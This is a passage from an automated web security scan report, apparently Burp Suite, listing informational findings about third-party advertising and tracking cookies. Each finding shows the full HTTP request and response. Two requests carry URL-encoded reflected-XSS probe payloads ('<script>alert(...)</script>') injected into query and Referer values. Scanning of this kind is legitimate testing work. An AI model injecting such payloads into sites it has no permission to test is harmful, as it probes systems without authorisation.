Set-Cookie: BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:55 GMT; path=/
Set-Cookie: ROLL=AfAiZ6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:55 GMT; path=/
Set-Cookie: 83041319=_4d96152f,2174120635,782464^950887^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Fri, 01 Apr 2011 18:10:55 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 571

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/00F/jview/249184162/direct;wi.300;hi.250/01?click=http://r1-ads.ace.advertising.com/click/site=000078246
...[SNIP]...

6.109. http://safebrowsing.clients.google.com/safebrowsing/downloads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://safebrowsing.clients.google.com
Path:	/safebrowsing/downloads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301674073:GM=1:IG=3:SG=1:S=ps_zWfqBdyxTsy8E; expires=Sun, 31-Mar-2013 16:07:53 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /safebrowsing/downloads?client=googlechrome&appver=10.0.648.204&pver=2.2&wrkey=AKEgNiu2mFE63FMw496NljDbfuqWVUHfR5aspR9G78SPoDGBnjDblFO5_v3By_lHgdefi2qYWL0qQkqRPEgqQcEZbPgzqr3RaA== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Length: 104
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301670461:GM=1:IG=3:SG=1:S=6_NoBG32_4ZLZ-lt

goog-malware-shavar;a:28059-35120:s:40797-47629:mac
goog-phish-shavar;a:130602-134878:s:67122-68830:mac

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.google.safebrowsing-update
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301674073:GM=1:IG=3:SG=1:S=ps_zWfqBdyxTsy8E; expires=Sun, 31-Mar-2013 16:07:53 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Fri, 01 Apr 2011 16:07:53 GMT
Server: Chunked Update Server
Content-Length: 923
X-XSS-Protection: 1; mode=block
Expires: Fri, 01 Apr 2011 16:07:53 GMT
Cache-Control: private

m:QiA97d47udlq4_nytVoG-FHP-I4=
n:1757
i:goog-malware-shavar
u:safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYjfQCII70AjIFDboAAAM,26xHNqb01lIg_FiyLyXjBNxXf0Q=
u:safebrows
...[SNIP]...

6.110. http://syndication.mmismm.com/tntwo.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://syndication.mmismm.com
Path:	/tntwo.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

U=AAAAAAAAAACMOJ53uksRkw--; expires=Fri, 01-Apr-2016 00:17:19 GMT; path=/; domain=.mmismm.com
G=10104000001069486483; expires=Fri, 01-Apr-2016 00:17:19 GMT; path=/; domain=.mmismm.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tntwo.php?mm_pub=7333&u=http%3A%2F%2Fwww.aeriagames.com%2Ffavicon.icof51ac%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E26b262688fc&r=http%3A%2F%2Fburp%2Fshow%2F40&t=300 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G=10104000001069486483

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:17:19 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=AAAAAAAAAACMOJ53uksRkw--; expires=Fri, 01-Apr-2016 00:17:19 GMT; path=/; domain=.mmismm.com
Set-Cookie: G=10104000001069486483; expires=Fri, 01-Apr-2016 00:17:19 GMT; path=/; domain=.mmismm.com
Content-Length: 72
Content-Type: text/javascript

var msegs='AH=1;AK=1;AN=1;AP=5;AQ=1;AR=1';Mindset.handleResponse(msegs);

6.111. http://tags.bluekai.com/site/2045 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2045

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=JfvU5CAacrJh4f95; expires=Wed, 28-Sep-2011 18:17:05 GMT; path=/; domain=.bluekai.com
bkc=KJh5NVN1kVDROdegmqhpzaWVVSRNKDxdJOImnAsEktYNZ1zFoVANa3jD/lBrkwJucOVaYWgUumk+4GOVRTZBTPSROqSjtKon6ydBBJkSeHSOGlnEIFI4ztfw45N4p+kF8l252Xr8fIK87iciNTGzcV0BoACCPUIt0mYQ015MIb/CrEIwUgkcII7Dov5pHYGM7FpyXdbGJ0J6CKmccJzfn7BzbgMWXugcepoKbqM/XUncEhPG4I+gcNG30k0dX4hj/rLUKF/O2LBTFWYDZEzKhz49luJ+mf5CF0dFGxXfj+TTQoGEUuv7KrnN2vMMfqmNNp7IvW5f6PhwH7gTdXV58fQUIHWgl0ti47XTgaloZwmlw5roEfWzyNMpfdVAGKVBSvozY2mqUCPk2M1IQFBlzAEAt5D5312wG22N4JIFpUgM2pcGcT6T1IMc25c4at345LhbTtwGkpG31kSU5BLYqKSBgtUCd10/qcQibSTpt+DBtCLzk2bP59XIXgWdPjjfXgxwmrjX33hItX2TLCQmZ4ayFtNUmcbXVgF3Ert8M3I6S92LNrjXMWKhUp7RpNOa4c86uPiqKK1mdeSjTDkgqP16U5TgoF26pnhhar3wcheJF5yKNBmq5ZrUhfE8qj0JI4bYdjQRMZsI8IbC5fbicUw1XRlc1jdhnW2rqtGnNA+p4qSjB8b9J8edLnW+scXiAq4BFwWLl/XqrjbzUqfloF2mNtqKKe1IIZTP3RdDTp85UWllmZqKI1VWZT5SQdggKadAJ2TU/qyFSw8rdOUtnyFdjdMgVJY7FNripqphcey44X/CpEpsdzGBdB+sDV8hUekcZI4w+g5x2hwccBITWdL8M41pBH04eplkZckMwB3kOw4FjW1E7LddlDsF02jKb8MNhZs1fIw2zdHTz2Ywnif68w0UpjCwur9nF7q8bbn14LSFjR3An4jAUZW2lmfEHfSvXZccge5ZFyVHIcMOdz/CU/UNEVvIhoWktk04q4RpgLwchstTz8qccEBF7/lhrtL235rS2YbXMh4O/5hWIg0Fp4typUfsyfCdlIe8sqjXy7ayd3pbp3UhdChd5pgV2YEVXNnuSXnSyUGEfLE87T42KiStnjGCGyP6VqPt3VwVsfIektcMY+0jH8bwoA7FGluZTXkifDrm2pIQFzXhhf12M4+f029nm/X5a4uDTfXzdNmz2Y5T7LEyFg8yRy4tqfNc7XwplEqc1hb920Jd14OMQjZlpqhhwfynIU2CfZ2d/ZIqKKwwTcqAh0ypqp+Tc04Xv50vd/IVZq4BFwWxl/7XZ8Sj+XtXXKXTEtFfwcA8DCXXpI7wm6ujKK1+vWgOII4vghFCZo/+i4+Cl/Kp+0nEAhpX4IhwapkZlMiWdMmTwtUaBE52N4ajU8Fl0Eqfsz2Q4Ew57FiVlN3Z45gUjMdqfs5XaxbdfzAUHDk7mI8So7lvNtjdtIhF7/F8c6E2zfANmvXf9kd0+PkFZdUsdyBcsqzG; expires=Wed, 28-Sep-2011 18:17:05 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2045?ret=js HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99W4pVANemJaB; bkst=KJhMR5Mehx9WMfmf4PAR2Qwj/QpKcgGsDsO3RZkrqsoCSzk2G9WG4yQGgXJQAsvSSZCiZSvqjJHGGs+iRsZQZtH3kvogjQkuq8vz7s3zpmx11rXeDe6fxtkK5k8IK5fOZHm9xAr81RHTKHQRCOk1E1yBEWhBEztBMD0BQuRjZhCzBtXeuLFh1Mey1nM7JszDIuR8sFGsOXN2eBntAC4AsewMPvBAzl1nlEEMPWB5Ahxe/NtnNaxMUu1py8u6He1EYhwMkcvMWkX9m1X8i9==; bko=KJ0gatOQmc5fGiXMyy6mOGRPM0z9Vx81e9y7jTJR7FyyNixtOGSexORwQpzFC1UW/9KDMxpFOL33XXJR1fQjseE9gWuQs1KKOiOniTKO/Erds3QM9zbu8/mytOCAGuymOkVQeFb+Zq8zecK9nWflea2VOQO5C0m1; bkw5=KJhNAM+n96WDCz2WzHXALDiCiR2Y/DQ6nkAi83sqhYz/V3HRuud8et7aG9COZ0i/CjDdx1Hu1JPtPMjYOYr+nvJOgn0pLtxtSnSR7ql4FU4mrErsYMePO7XR2MuIZQMHNIDDnjWBbwxSH2wQHBBFETsOs/P6xzqybicBSP8Mm0umXTxAiicJn9oJu5SJqJsYsxjDSqIAaUawVVszmPAdV37Si2uKQ/XWNfbsEbGwre8mIgfEy/xJ3sf79f8lLf81VEcR3P9px/lbyMNkaajv7cnHO3fZ3WvpW4VH4hEuzAfdW8FxMDmvKaHTpW3nqiBeFDioxoBmzE6tMAkqYJBj6SNm1uDMPcB+WPKNc+iB1Lx0yCL7zzdIqAcbecq8qci/lis+1FYXvmzDLIuJTzbJ2EJeyhJdT89X2I1bOdC/4Tbuhnx3a/W3j3/QZJ4dCmz0biZbKPlLDNj8t1SmWlFn0pktAlzwZPdItbl+w6G0qvfyKfl+hCbzFJRdSpvXgwJqDUxzdQJrnVCy; bklc=4d96162f; bk=quDHgOAacrJh4f95; bkc=KJh5NZN1kVDROdegT4U9yUUv/Lr6JGdGCIEe6uPGXCvLaFw6oEu+hLvDSZEmMPJKi3miWWcosiV2gxdxSibh15yvLX9t1N+2S43CZujE3XWizaHrV4dgmK4ilB4N8qe4pFIbfo5plXde5O8HP5uMflXbWwm/SO3rBnfwr1vTlnM1rBHTM4s2h3rBiTNUsM2K3wtBgdlOzkJI/iwkxfkWQTBWcTl+MbUHl47LNUrNmu2Km/5GytvwlGm87MNKu13zaTdiRIOtGFj5ttwo5cAFIf9h8XPHNJpGJMgPZbC7MhgFZvr2lFMewm6kXp6SbKU8J8hFl/4XiJwF/Pn4lhdVgMnZIqrKSIgEczzhNL/fwVoL4EVVx54Yf16FAEnlWhdOdoXz/Uo3qu43YpnjqhF48V+pF4C5ewofWXTRIFcbtBXPSjXt87gh14EnsYDS36I84jWt8XUUz7eKjGQtwoo02h7+ZAq+Mzjk+bUziTXYfWINT28XfRwswJ23o2Im1hT+C5BAwJhFN8UsM2HGP2I3w5dTu3FtyOj+7G2TawrPCdN136p1MN6SNrSXrOw4EVjfNaqUc1ri56gR4hCpUo0eIrBFWDDr5yENf1Nf+YFitFhUc1JX4XjIE9pc152p5fOlFSQ5BIqhhKmRplimHpzl+y4gj4wbUcBKw9aw/w2IDlLydAx0f8gpTMZTc2zMcoN5rVdV4tPozNbXOHd2Bh/NHO+y70brj4zjzNfXUB/+xtNOdqdjHcT565cOk9r1mudIWFrjQ2XldaPXN+Xr6ISXKObKkpdi6/SmX48a9FIbijHqMSFZS4B85m6+NFl/Z1zU5tadolsKoGREXtawsUBKMWz2kK/I7ZhLhFwbFNFRblmNNhkpFEi1XUtXFTTKqy7bLDrvwegdHxFZAhfTQ325XxGozpdh00sipvDKnuC3Qe+X2oa+ocpRZmFals2HBeaKzB2yvB5Q4jmRgpibEJFU88gfiKFh1UWEf3eMzVwmil1h4AI5HdUqD+bB2dAum96lAllKNIq2z1l2h1mTMNdMKHot41/Tmc2m4540HcXK46XVNFxRNFBX0QIa+RwNJ+taXfX9IdPA4cLLZ6RntKDNtZUsUY2IW0dcokVT1yXXWXrAFQ4j/KwJWrNnhQ4r658Fpmm87Lq2FVcGVjpcpAgtkws4h7IUowyh7i2hFnXFUBIJd5FQLzdCKKIShh1wywrxFhMTTzYz5XN8XuaTBdndy1cdjXZXSXbnwTDfAO2ppc7Uy4L8bDdQBrHdz1h8N8yUeXa50ndZZwmrmudIeK5oUq2cn6xqQrzfIfBmDrSXKYrv6FWIrFnnJgit5sF04GMfz4jVCEpvyIdcd57ahoyUobcdem8wKD7+gvXS7dVNIEb887fisShFoLzMldcgvfHwI2gzppUlWNIayt2T2ckh0g7slur6Ed7SlBXN2h5c1wIe3cXbDGFprMwyJPIqbNNpF4CdhSKNF9==; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E1015RUZIRnksHQRLMmDsYyBeRt1ManBEOvBALhuAyN1ERhBWXN1DQhEAG01MD61RvojZB/0ibmJ6Nc5AjXuATaXE3RsP/pD8QjMYp9qQx943A3Sx==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Fri, 01 Apr 2011 18:17:05 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Sat, 02 Apr 2011 18:17:05 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=JfvU5CAacrJh4f95; expires=Wed, 28-Sep-2011 18:17:05 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5NVN1kVDROdegmqhpzaWVVSRNKDxdJOImnAsEktYNZ1zFoVANa3jD/lBrkwJucOVaYWgUumk+4GOVRTZBTPSROqSjtKon6ydBBJkSeHSOGlnEIFI4ztfw45N4p+kF8l252Xr8fIK87iciNTGzcV0BoACCPUIt0mYQ015MIb/CrEIwUgkcII7Dov5pHYGM7FpyXdbGJ0J6CKmccJzfn7BzbgMWXugcepoKbqM/XUncEhPG4I+gcNG30k0dX4hj/rLUKF/O2LBTFWYDZEzKhz49luJ+mf5CF0dFGxXfj+TTQoGEUuv7KrnN2vMMfqmNNp7IvW5f6PhwH7gTdXV58fQUIHWgl0ti47XTgaloZwmlw5roEfWzyNMpfdVAGKVBSvozY2mqUCPk2M1IQFBlzAEAt5D5312wG22N4JIFpUgM2pcGcT6T1IMc25c4at345LhbTtwGkpG31kSU5BLYqKSBgtUCd10/qcQibSTpt+DBtCLzk2bP59XIXgWdPjjfXgxwmrjX33hItX2TLCQmZ4ayFtNUmcbXVgF3Ert8M3I6S92LNrjXMWKhUp7RpNOa4c86uPiqKK1mdeSjTDkgqP16U5TgoF26pnhhar3wcheJF5yKNBmq5ZrUhfE8qj0JI4bYdjQRMZsI8IbC5fbicUw1XRlc1jdhnW2rqtGnNA+p4qSjB8b9J8edLnW+scXiAq4BFwWLl/XqrjbzUqfloF2mNtqKKe1IIZTP3RdDTp85UWllmZqKI1VWZT5SQdggKadAJ2TU/qyFSw8rdOUtnyFdjdMgVJY7FNripqphcey44X/CpEpsdzGBdB+sDV8hUekcZI4w+g5x2hwccBITWdL8M41pBH04eplkZckMwB3kOw4FjW1E7LddlDsF02jKb8MNhZs1fIw2zdHTz2Ywnif68w0UpjCwur9nF7q8bbn14LSFjR3An4jAUZW2lmfEHfSvXZccge5ZFyVHIcMOdz/CU/UNEVvIhoWktk04q4RpgLwchstTz8qccEBF7/lhrtL235rS2YbXMh4O/5hWIg0Fp4typUfsyfCdlIe8sqjXy7ayd3pbp3UhdChd5pgV2YEVXNnuSXnSyUGEfLE87T42KiStnjGCGyP6VqPt3VwVsfIektcMY+0jH8bwoA7FGluZTXkifDrm2pIQFzXhhf12M4+f029nm/X5a4uDTfXzdNmz2Y5T7LEyFg8yRy4tqfNc7XwplEqc1hb920Jd14OMQjZlpqhhwfynIU2CfZ2d/ZIqKKwwTcqAh0ypqp+Tc04Xv50vd/IVZq4BFwWxl/7XZ8Sj+XtXXKXTEtFfwcA8DCXXpI7wm6ujKK1+vWgOII4vghFCZo/+i4+Cl/Kp+0nEAhpX4IhwapkZlMiWdMmTwtUaBE52N4ajU8Fl0Eqfsz2Q4Ew57FiVlN3Z45gUjMdqfs5XaxbdfzAUHDk7mI8So7lvNtjdtIhF7/F8c6E2zfANmvXf9kd0+PkFZdUsdyBcsqzG; expires=Wed, 28-Sep-2011 18:17:05 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 02-Apr-2011 18:17:05 GMT; path=/; domain=.bluekai.com
BK-Server: 7b05
Content-Length: 41
Content-Type: text/javascript
Connection: keep-alive

var bk_results = {
"campaigns": [
]
};

6.112. http://tags.bluekai.com/site/2731 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2731

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bklc=4d96162f; expires=Sun, 03-Apr-2011 18:15:11 GMT; path=/; domain=.bluekai.com
bk=quDHgOAacrJh4f95; expires=Wed, 28-Sep-2011 18:15:11 GMT; path=/; domain=.bluekai.com
bkc=KJh5NZN1kVDROdegT4U9yUUv/Lr6JGdGCIEe6uPGXCvLaFw6oEu+hLvDSZEmMPJKi3miWWcosiV2gxdxSibh15yvLX9t1N+2S43CZujE3XWizaHrV4dgmK4ilB4N8qe4pFIbfo5plXde5O8HP5uMflXbWwm/SO3rBnfwr1vTlnM1rBHTM4s2h3rBiTNUsM2K3wtBgdlOzkJI/iwkxfkWQTBWcTl+MbUHl47LNUrNmu2Km/5GytvwlGm87MNKu13zaTdiRIOtGFj5ttwo5cAFIf9h8XPHNJpGJMgPZbC7MhgFZvr2lFMewm6kXp6SbKU8J8hFl/4XiJwF/Pn4lhdVgMnZIqrKSIgEczzhNL/fwVoL4EVVx54Yf16FAEnlWhdOdoXz/Uo3qu43YpnjqhF48V+pF4C5ewofWXTRIFcbtBXPSjXt87gh14EnsYDS36I84jWt8XUUz7eKjGQtwoo02h7+ZAq+Mzjk+bUziTXYfWINT28XfRwswJ23o2Im1hT+C5BAwJhFN8UsM2HGP2I3w5dTu3FtyOj+7G2TawrPCdN136p1MN6SNrSXrOw4EVjfNaqUc1ri56gR4hCpUo0eIrBFWDDr5yENf1Nf+YFitFhUc1JX4XjIE9pc152p5fOlFSQ5BIqhhKmRplimHpzl+y4gj4wbUcBKw9aw/w2IDlLydAx0f8gpTMZTc2zMcoN5rVdV4tPozNbXOHd2Bh/NHO+y70brj4zjzNfXUB/+xtNOdqdjHcT565cOk9r1mudIWFrjQ2XldaPXN+Xr6ISXKObKkpdi6/SmX48a9FIbijHqMSFZS4B85m6+NFl/Z1zU5tadolsKoGREXtawsUBKMWz2kK/I7ZhLhFwbFNFRblmNNhkpFEi1XUtXFTTKqy7bLDrvwegdHxFZAhfTQ325XxGozpdh00sipvDKnuC3Qe+X2oa+ocpRZmFals2HBeaKzB2yvB5Q4jmRgpibEJFU88gfiKFh1UWEf3eMzVwmil1h4AI5HdUqD+bB2dAum96lAllKNIq2z1l2h1mTMNdMKHot41/Tmc2m4540HcXK46XVNFxRNFBX0QIa+RwNJ+taXfX9IdPA4cLLZ6RntKDNtZUsUY2IW0dcokVT1yXXWXrAFQ4j/KwJWrNnhQ4r658Fpmm87Lq2FVcGVjpcpAgtkws4h7IUowyh7i2hFnXFUBIJd5FQLzdCKKIShh1wywrxFhMTTzYz5XN8XuaTBdndy1cdjXZXSXbnwTDfAO2ppc7Uy4L8bDdQBrHdz1h8N8yUeXa50ndZZwmrmudIeK5oUq2cn6xqQrzfIfBmDrSXKYrv6FWIrFnnJgit5sF04GMfz4jVCEpvyIdcd57ahoyUobcdem8wKD7+gvXS7dVNIEb887fisShFoLzMldcgvfHwI2gzppUlWNIayt2T2ckh0g7slur6Ed7SlBXN2h5c1wIe3cXbDGFprMwyJPIqbNNpF4CdhSKNF9==; expires=Wed, 28-Sep-2011 18:15:11 GMT; path=/; domain=.bluekai.com
bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E1015RUZIRnksHQRLMmDsYyBeRt1ManBEOvBALhuAyN1ERhBWXN1DQhEAG01MD61RvojZB/0ibmJ6Nc5AjXuATaXE3RsP/pD8QjMYp9qQx943A3Sx==; expires=Wed, 28-Sep-2011 18:15:11 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2731 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99W4pVANemJaB; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jffK//FDJvOiuWfxTcO6+MR01xLNz9GtupavecPhBMW6epPhYeamY7J0BExh9iZZG6CvqLT7Mx5tH7hvEAPhm+QjAMBEsaZ1n/9rhW9ENRyzQ==; bkst=KJhMR5Mehx9WMfmf4PAR2Qwj/QpKcgGsDsO3RZkrqsoCSzk2G9WG4yQGgXJQAsvSSZCiZSvqjJHGGs+iRsZQZtH3kvogjQkuq8vz7s3zpmx11rXeDe6fxtkK5k8IK5fOZHm9xAr81RHTKHQRCOk1E1yBEWhBEztBMD0BQuRjZhCzBtXeuLFh1Mey1nM7JszDIuR8sFGsOXN2eBntAC4AsewMPvBAzl1nlEEMPWB5Ahxe/NtnNaxMUu1py8u6He1EYhwMkcvMWkX9m1X8i9==; bk=idGY+CAacrJh4f95; bkc=KJh5NZN1kVDROdegmqy5mnQG00pEZM0iUIEe6uPGXCvLaFwToEu+hLvDSZEmMPJKi3miWWcosiPVgQdxSibh15yvLX9t1N+2S43CZujE3lWVQSB00do4eI4ilB4N8qe4pFIbfo5plXdejY8Hj5uMflXbWwm/SOvr1cfxrB0TpnMDr1HT+4Weh3r1iThUse2jGwtBgdlO1kJIvMlk/pkW9yBWcTlr7ds3F53za0IRHqHCAD4FmhTg/sUmi64y6UXlD5rrfqW6rg3U45uRXI/GSA8NWjloZS87MhMFZvt2lFMeUmlaXpySCABJppcrHUfR0UzE3KX4iZCUsFwXUzXt2VZmThCgyq6KBquXcAr7shct8k5/Z4rJMtcdEyXEwqmZ9dU8sKhehF48tkyF4QIed+b/1TjIFeft5TUSjTt8U7yYd5JciWqgDZ8q31N8XRNL7nzoGGtwo2hNEgrbxUrMzKk5v44Q/hdfDIVTjTftxVmKE8UEqXz8M8q9/HAw82+NC4aMN5oP5tgw1ffVG+tdHjF7/hfO4rPiw61P6dBMk6u6mudryc4MVHbNNMqa1r75RFR4hoyUjbwI8e+WKP4qQlgt8MlS8Ua+diLmRfTdRpXuxlc12X/2fa6FSXKBKUphsmRpkrlHfDN+yUgjFefU7Oz7T9E0ChFqQFWE0qhgpG+7TUfzpwwGd/o21dTgD8FpTilTbnrP3e8SMd+6KxtfN8MpTCKuqC8LeKgdpun0STZmebuzqXh8Xj4RptpXFosFTMwI53At8XPpXqpXWRzt4/nln0dyg8+/rzVTz3Tt764Ulin5MTh84cW727zu8tkiScGIf9kMpGFh3vzul14EeDNTUF2lOl+2MFRbRbTUHpYIMd4UXjwBxE2tzSacaf2Gh7pu9kd0+z+4/tUrJlTNEJuhhvw8C4PyrXXI+GtDMhopFjMfnRhmMh4zBhpvNPM4mmRgMifP8FV887fim7yAqL155ehZpckheLqFgFVGqkFvrdWIUy0czewjalN+lQdUlWXXCwFTBjb7WzK7M/wp82HlnoFrpIwF0zuS7LObUAh8qDxfVsdu7EMdXfa4EXKlhfJGo/O5P3N5SLpNTg4hzZhziEFpXcmhemo2CO6tcidVFZJXTcf+dzRX7r+JlB2qOodcKK0GRWXRdt7X5lcvcIw8WL4fI2nB75ideHff9oflg7AXzEIXed7nQHXBpc7U7Oz4QUzMdyXzdwIPpnFZFwCErOl8DzKz5htX78wIOs8adQ4c7c4BK4WQl/7XsTT8f8gpT+2y7+qNK4Hu+e8TFg1db0OkpGrlGiQBfbBgFt0YS63tJrIcr927qtURGNpX4+04UVE1KUW/dS5y4X3vStjXl4iXgXll0EUlW62C4Pw5cFZmlN0r45qU87brrjdTmCh80bwwiNnm1K8Sg7lsNIqIggZdm9dpwTMbjdB3za8lOgfiSlm2SbTUdy2AVgEp; bko=KJ0gatOQmc5fGiXMyy6mOGRPM0z9Vx81e9y7jTJR7FyyNixtOGSexORwQpzFC1UW/9KDMxpFOL33XXJR1fQjseE9gWuQs1KKOiOniTKO/Erds3QM9zbu8/mytOCAGuymOkVQeFb+Zq8zecK9nWflea2VOQO5C0m1; bkw5=KJhNAM+n96WDCz2WzHXALDiCiR2Y/DQ6nkAi83sqhYz/V3HRuud8et7aG9COZ0i/CjDdx1Hu1JPtPMjYOYr+nvJOgn0pLtxtSnSR7ql4FU4mrErsYMePO7XR2MuIZQMHNIDDnjWBbwxSH2wQHBBFETsOs/P6xzqybicBSP8Mm0umXTxAiicJn9oJu5SJqJsYsxjDSqIAaUawVVszmPAdV37Si2uKQ/XWNfbsEbGwre8mIgfEy/xJ3sf79f8lLf81VEcR3P9px/lbyMNkaajv7cnHO3fZ3WvpW4VH4hEuzAfdW8FxMDmvKaHTpW3nqiBeFDioxoBmzE6tMAkqYJBj6SNm1uDMPcB+WPKNc+iB1Lx0yCL7zzdIqAcbecq8qci/lis+1FYXvmzDLIuJTzbJ2EJeyhJdT89X2I1bOdC/4Tbuhnx3a/W3j3/QZJ4dCmz0biZbKPlLDNj8t1SmWlFn0pktAlzwZPdItbl+w6G0qvfyKfl+hCbzFJRdSpvXgwJqDUxzdQJrnVCy

Response

HTTP/1.0 200 OK
Date: Fri, 01 Apr 2011 18:15:11 GMT
Set-Cookie: bklc=4d96162f; expires=Sun, 03-Apr-2011 18:15:11 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Sat, 02 Apr 2011 18:15:11 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=quDHgOAacrJh4f95; expires=Wed, 28-Sep-2011 18:15:11 GMT; path=/; domain=.bluekai.com
